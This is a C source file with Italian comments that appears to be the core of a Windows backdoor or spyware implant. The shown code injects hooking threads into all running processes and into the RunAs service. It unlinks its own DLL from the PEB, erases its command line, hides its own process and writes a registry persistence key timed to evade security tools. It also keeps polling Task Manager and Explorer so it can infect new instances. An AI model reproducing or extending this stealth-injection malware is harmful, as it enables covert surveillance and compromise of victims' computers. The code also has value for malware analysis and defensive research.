		// Controlla il CRC (viene fatto su tutta la parte cifrata, togliendo il CRC stesso)
		temp_hash = 0;
		ptr = (char *)conf_memory_clear;
		for (DWORD i=0; i<(*conf_clear_len)-sizeof(DWORD); i++) {
			temp_hash++;
			if (*ptr)
				temp_hash *= (*ptr);
			conf_hash = (DWORD)(temp_hash >> 32);
			temp_hash &= 0xFFFFFFFF;
			temp_hash ^= conf_hash;
			ptr++;
		}
		conf_hash = (DWORD)temp_hash;
		file_crc = (DWORD *)(conf_memory_clear + (*conf_clear_len) - sizeof(DWORD));
		if (*file_crc != conf_hash) {
			SAFE_FREE(conf_memory_clear);
			return NULL;
		}
	}
	return conf_memory_clear;
}


// Legge le configurazioni globali
// Il delta date (prime due DWORD) non sono offuscate
void HM_UpdateGlobalConf()
{
	HANDLE h_conf_file;
	DWORD readn;
	char conf_path[DLLNAMELEN];
	BYTE *conf_memory;

	// Se non riesce a leggere la configurazione, inizializza comunque
	// i valori globali.
	memset(&date_delta, 0, sizeof(date_delta));
	// Lista di processi da non toccare
	process_bypassed = EMBEDDED_BYPASS;
	strcpy(process_bypass_list[0],"outlook.exe");
	//strcpy(process_bypass_list[1],"ht-backdoor.exe");
	// XXX Se ne aggiungo, ricordarsi di modificare EMBEDDED_BYPASS

	h_conf_file = CreateFile(HM_CompletePath(H4_CONF_FILE, conf_path), GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	if (h_conf_file == INVALID_HANDLE_VALUE)
		return;

	// Legge il delta delle date
	// Se non legge rimane come e' inizializzato
	ReadFile(h_conf_file, &date_delta, sizeof(date_delta), &readn, 0);
	CloseHandle(h_conf_file);

	// Legge la lista dei processi da bypassare 
	conf_memory = HM_ReadClearConf(H4_CONF_FILE);
	
	// Effettua il parsing del file di configurazione mappato
	// XXX Non c'e' il controllo che conf_ptr possa uscire fuori dalle dimensioni del file mappato
	// (viene assunto che la configurazione sia coerente e il file integro)
	if (conf_memory) {
		DWORD index, param_len;
		BYTE *conf_ptr;

		// conf_ptr si sposta nel file durante la lettura
		conf_ptr = (BYTE *)HM_memstr((char *)conf_memory, BYPAS_CONF_DELIMITER);

		// ---- Configurazione process bypass ----
		READ_DWORD(process_bypassed, conf_ptr);
		if (process_bypassed > MAX_DYNAMIC_BYPASS)
			process_bypassed = MAX_DYNAMIC_BYPASS;
		process_bypassed += EMBEDDED_BYPASS; // Inserisce i processi hardcoded

		// Legge i processi rimanenti dal file di configurazione
		for (index=EMBEDDED_BYPASS; index<process_bypassed; index++) {
			READ_DWORD(param_len, conf_ptr);
			// Il nome dei processi deve essere NULL terminated
			_snprintf_s(process_bypass_list[index], MAX_PATH, _TRUNCATE, "%s", (char *)conf_ptr);
			conf_ptr += param_len;
		}
		SAFE_FREE(conf_memory);
	}
}


// Prende il path del browser di default
// Torna TRUE se ci riesce
BOOL HM_GetDefaultBrowser(char *path_name)
{
#define IEPATH "http\\shell\\open\\command"

	HKEY hIEPath;
	char short_path[DLLNAMELEN];
	char unquoted_long_path[DLLNAMELEN];
	DWORD iLen = sizeof(short_path);
	char *clean_short_path;
	char *params;

	// Apre il registry
	if(RegOpenKey(HKEY_CLASSES_ROOT, IEPATH, &hIEPath) != ERROR_SUCCESS )
		return FALSE;
	if(RegQueryValueEx(hIEPath, NULL, NULL, NULL, (BYTE *)short_path, &iLen) != ERROR_SUCCESS) {
		RegCloseKey(hIEPath);
		return FALSE;
	}

	// Toglie eventuali parametri
	params = strstr(short_path, ".exe");
	if (params)
		params[4] = 0;
	params = strstr(short_path, ".EXE");
	if (params)
		params[4] = 0;
	clean_short_path = short_path;
	if (short_path[0]=='"')
		clean_short_path++; 

	// Prende il long name
	if (!GetLongPathName(clean_short_path, unquoted_long_path, DLLNAMELEN))
		return FALSE;

	// Lo mette tra "" per evitare ambiguita' alla CreateProcess
	sprintf(path_name, "\"%s\"", unquoted_long_path);

	return TRUE;
}


// Inietta il thread di hooking in tutti i processi attivi
// tranne che nel processo chiamante
BOOL HM_HookActiveProcesses()
{
	HANDLE hProcessSnap;
	PROCESSENTRY32 pe32;
	DWORD dwCallingPid;
	DWORD integrity_level;
	DWORD service_pid;

	// Vede se siamo su Vista
	if (IsVista(&integrity_level) && integrity_level>=IL_HIGH) {
		//SetDebugPrivilege(TRUE); su vista il core  gi lanciato con questo privilegio
		// Se si, infetta il servizio di RunAs
		if (service_pid = FindRunAsService()) 
			HM_sStartHookingThread(service_pid, NULL);
		//SetDebugPrivilege(FALSE);
	}

	// Continua con l'infection dei processi utente
	pe32.dwSize = sizeof( PROCESSENTRY32 );
	dwCallingPid = GetCurrentProcessId();
	if ( (hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 )) == INVALID_HANDLE_VALUE )
		return FALSE;

	if( !Process32First( hProcessSnap, &pe32 ) ) {
		CloseHandle( hProcessSnap );
		return FALSE;
	}

	// Cicla la lista dei processi attivi
	do {
		// Effettua l'hook solo se il processo non e' il chiamante
		if (pe32.th32ProcessID != dwCallingPid && IsMyProcess(pe32.th32ProcessID))
			HM_sStartHookingThread(pe32.th32ProcessID, NULL);
	} while( Process32Next( hProcessSnap, &pe32 ) );

	CloseHandle( hProcessSnap );
	return TRUE ;
}

// Monitora la presenza di nuovi TaskManager
// o explorer.exe in cui effettuare l'injection.
// Monitora anche la coda dei messaggi per effettuare
// la chiusura del processo.
// Diventa il loop principale del programma.
#define HM_PTSLEEPTIME 200
#define PROCESS_POLLED 3

void HM_StartPolling(void)
{
	MSG msg;
	DWORD last_pid[PROCESS_POLLED];
	DWORD new_pid[PROCESS_POLLED];
	char *polled_name[PROCESS_POLLED];
	DWORD i;

	polled_name[0] = "taskmgr.exe";
	polled_name[1] = "explorer.exe";
	polled_name[2] = "mghtml.exe";


	for (i=0; i<PROCESS_POLLED; i++)
		last_pid[i] = HM_FindPid(polled_name[i], TRUE);

	LOOP {
		// Usato solo per monitorare il messaggio di QUIT
		// quando viene effettuato il logoff
		PeekMessage(&msg, NULL, 0, 0, PM_REMOVE);

		// Controlla se ci sono nuovi processi
		for (i=0; i<PROCESS_POLLED; i++) {
			new_pid[i] = HM_FindPid(polled_name[i], TRUE);
			// Se c'e' ed e' diverso da quello precedente
			if (new_pid[i] && new_pid[i]!=last_pid[i]) 
				HM_sStartHookingThread(new_pid[i], NULL);
			
			last_pid[i] = new_pid[i];
		}

		Sleep(HM_PTSLEEPTIME);
	}
}


BOOL FindModulePath(char *path_buf, DWORD path_size)
{
	HMODULE hLib= NULL;
	HMODULE modules[1024];
	char temp_buf[_MAX_PATH * 2 + 2];
	char *dos_ascii_name;
	DWORD mod_size;
	DWORD mod_num;
	DWORD i;

	// Se ha gia' le variabili settate le recupera da li'
	// altrimenti (e' la prima volta che lo chiama, o siamo in un servizio che
	// non ha la shared), la calcola al volo.
	HM_CompletePath(H4DLLNAME, path_buf);
	if (strlen(path_buf) >= 3)
		return TRUE;

	// Cerca il modulo che esporta la funzione HFF1 (cioe' se stesso)
	if (!EnumProcessModules(GetCurrentProcess(), modules, sizeof(modules), &mod_size)) 
		return FALSE;

	mod_num = mod_size/sizeof(HMODULE);
	for (i=0; i<mod_num; i++) {
		// L'abbiamo trovato
		if ((DWORD)GetProcAddress(modules[i], "HFF1") == (DWORD)HM_sCreateHookA)
			hLib = modules[i];
	}

	if (!hLib) 
		return FALSE;
	
	ZeroMemory(temp_buf, sizeof(temp_buf)); // Ci assicuriamo che il nome sia NULL terminato
	if (!GetModuleFileNameExW(GetCurrentProcess(), hLib, (WCHAR *)temp_buf, _MAX_PATH)) 
		return FALSE;

	if (!(dos_ascii_name = GetDosAsciiName((WCHAR *)temp_buf)))
		return FALSE;

	_snprintf_s(path_buf, path_size, _TRUNCATE, "%s", dos_ascii_name);
	SAFE_FREE(dos_ascii_name);
	
	return TRUE;
}


// Cancella la command line
void HM_ClearCommand()
{
	char *ptr;
	char *cmd_lineA;
	wchar_t *cmd_lineW;
	wchar_t *ptrW;
	
	cmd_lineA = GetCommandLineA();
	if ( !(ptr = strchr(cmd_lineA, ' ')) )
		return;
	while(*ptr) {
		*ptr = 0;
		ptr++;
	}

	cmd_lineW = GetCommandLineW();
	if ( !(ptrW = wcschr(cmd_lineW, ' ')) )
		return;
	while(*ptrW) {
		*ptrW = 0;
		ptrW++;
	}
}


// Main del core
void __stdcall HM_sMain(void)
{
	pid_hide_struct pid_hide;

	//Riempie i campi relativi al nome del file immagine,
	//file di configurazione, directory di installazione
	//etc. Va fatta come PRIMA cosa.
	if (!HM_GuessNames())
		ExitProcess(0);

	// Elimina il modulo dalla PEB
	// XXX da qui in poi non potro' piu' fare GetModuleHandle etc. di questo modulo
	HidePEB(GetModuleHandle(H4DLLNAME));

	// Cancella la command line
	HM_ClearCommand();

	// Toglie gli hook, prende i privilegi, etc.
	if (!doUnhook()) {
		ExitProcess(0);
	} 

	// Inizializza la chiave di cifratura (va fatto prima di qualsiasi
	// accesso al file di configurazione).
	LOG_InitCryptKey(bin_patched_key);

	// Controlla se c'e' un file di configurazione pendente
	// o corrotto (lo rimpiazza con l'eventuale copia di backup).
	// Va fatto prima di AM_Startup, perche' quest'ultima legge
	// gia' il file di configurazione.
	HM_CheckNewConf();

	// Legge le configurazioni globali. Va fatto DOPO HM_CheckNewConf.
	HM_UpdateGlobalConf();
	
	// L'agent manager deve essere startato prima di effettuare gli hook 
	// (infatti e' lui che inizializza tutta la parte di IPC).
	AM_Startup();

	// Effettua l'injection in tutti i processi attivi
	HM_HookActiveProcesses();

	// Nasconde il processo chiamante (host della DLL core)
	SET_PID_HIDE_STRUCT(pid_hide, GetCurrentProcessId());
	AM_AddHide(HIDE_PID, &pid_hide);

	// Inserisce la chiave nel registry
	// Viene fatto dopo l'hiding per evitare che venga vista da processi
	// come TeaTimer, ma fare attenzione che il processo core non possa 
	// uscire prima per altri errori (anche se c'e' qualche problema
	// la chiave nel registry deve essere inserita ad ogni costo).
	Sleep(3300); // XXX Aspetta che venga fatta l'injection prima di scrivere la chiave
	HM_InsertRegistryKey(H4DLLNAME);

	// Fa partire il sync manager 
	SM_StartMonitorEvents();

	// Ciclo per l'hiding da task manager e dai nuovi epxlorer
	// lanciati. Monitora anche la coda dei messaggi per
	// chiudere correttamente il processo al logoff.
	// E' nel thread principale per poter chiudere correttamente
	// il processo.
	HM_StartPolling();
}
